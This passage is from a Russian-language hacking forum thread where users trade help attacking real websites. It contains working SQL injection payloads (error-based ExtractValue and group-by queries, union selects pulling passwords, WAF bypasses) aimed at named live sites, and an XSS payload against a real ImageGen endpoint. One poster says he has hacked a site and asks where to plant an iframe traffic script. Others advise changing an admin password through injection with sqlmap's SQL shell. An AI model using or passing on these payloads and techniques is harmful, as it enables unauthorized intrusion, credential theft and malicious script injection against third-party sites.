Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    http://wiki.auditory.ru/Semenov_sql_injection'
    Не разберусь, WAF меняет пробелы и "+" "_", обходится /**/. Дальше не могу.
     
    _________________________
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    http://wiki.auditory.ru/Semenov_sql_injection'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
     
    _________________________
  3. sfinxs

    sfinxs New Member

    Joined:
    20 Feb 2008
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    привет )) взломал сайт а там такое в файле INDEX.PHP такое :

    <?php
    include 'init.php';
    $language = $frontend->getDefaultLanguage();
    $url = NeoRequest::getAbsoluteUri() . $language->ln . _NEO_CMS_FILE_EXT;
    NeoNavigator::jump($url);
    ?>

    и такое :

    <?php
    include 'init.php';
    include 'process.php';
    ?>

    вот как выглядит сама система :
    http://i42.tinypic.com/112hpud.jpg

    КУДА ВСТАВЛЯТь скрипт на ифрейм траффик и вообше почему совсем не такое как везде?
     
  4. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    При переходе на сайте на list.html?page=&page='
    выдает

    Можно как-то раскрутить и попробовать слить бд или залить шелл? Хелпаните..
    Если поставить скобки или другой символ, то же самое выдает.

    С &page=(select+top+1+table_name+from+information_schema.tables)

    Выдает мне Conversion failed when converting the nvarchar value 'Таблица' to data type int. (severity 16) in .....

    но при
    (select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('эта таблица'))
    выдает мне message: Incorrect syntax near 'эта же таблица\'. (severity 15) in ....
     
    #22804 zombak18, 8 Dec 2013
    Last edited: 8 Dec 2013
  5. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    При пост запросе
    в нейм %5C или \
    выдает
    Здесь куда-то иньекцию подставить можно? или как то это использовать...?
     
  6. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Да вот имеено.. дело в том, что если пишешь какой либо запрос, он просто пропускает это поле и регистрирует аккаунт без ошибок..

    %5C' - ошибка
    ' - нет ошибки
    %5C' пробел - нет ошибки
     
  7. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Code:
    name=%5c'or(extractvalue(1,concat(0x3a,user()))),1); -- w
    А так ?
     
  8. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Тоже пропускает.. пробел вроде фильтрует
    и со скобкой пропускает..
     
  9. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Кроме name другие параметры проходят через фильтр?
    Code:
    email1=asaa%40mail3.ru%5c&mail2=asaa%40mail3.ru%5c&name=,user()and(extractvalue(1,concat(0x3a,user()))),NOW());%23
    Можно линк в лс?
     
  10. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    чекни лс.. :rolleyes:
     
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Убери пробел, это форум добавил.
     
    _________________________
  12. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Пропускает :(
    если появляется другой символ кроме %5c сразу пропускает без ошибок..
     
  13. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    jquery cross site scripting - Кто слышал о таких уязвимостях? Что они из себя предстовляют? Может у кого есть примеры или мануал...
     
  14. mgVolt

    mgVolt New Member

    Joined:
    22 Aug 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Всем привет.
    Не подскажете, как эксплуатируется XSS в параметре font в Imagegen, CVE-2013-0741 (http://secunia.com/community/advisories/52771).
    Например, здесь http://www.viu.ca/ImageGen.ashx?image=/homestay/galleria_photos/013.JPG&width=960
     
  15. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    329
    Likes Received:
    42
    Reputations:
    -5
    как изменить пароль через sql инъекцию
    по гуглив немного я нашел вот что


    UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее:
    UPDATE users SET password = ‘qwerty’ WHERE name = admin;


    помогите составить запрос

    http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
     
  16. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    915
    Reputations:
    388
    забей скулю в SQLMAP. Раскрутит - запусти с параметром --sql-shell и делай запросы как тебе удобно)
     
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    никак не изменишь, нельзя в запросе использовать несколько разных операторов
     
  18. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Там есть нечто большее:
    Code:
    http://www.viu.ca/events/event.aspx?id=9275%20or%28select%281%29from%28information_schema.schemata%29where%281=1%29group%20by%28concat%28version%28%29,0x3b,user%28%29,floor%28rand%280%29*2%29%29%20%29having%28min%280%29%29%29
     
  19. mgVolt

    mgVolt New Member

    Joined:
    22 Aug 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Круто, но мне сам сайт не нужен, просто взял первый попавшийся, где используется imagegen :)
     
  20. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Code:
    http://www.viu.ca/ImageGen.ashx?font=%3Cscript%3Ealert%28/Test/%29%3C/script%3E
     
Loading...
Thread Status:
Not open for further replies.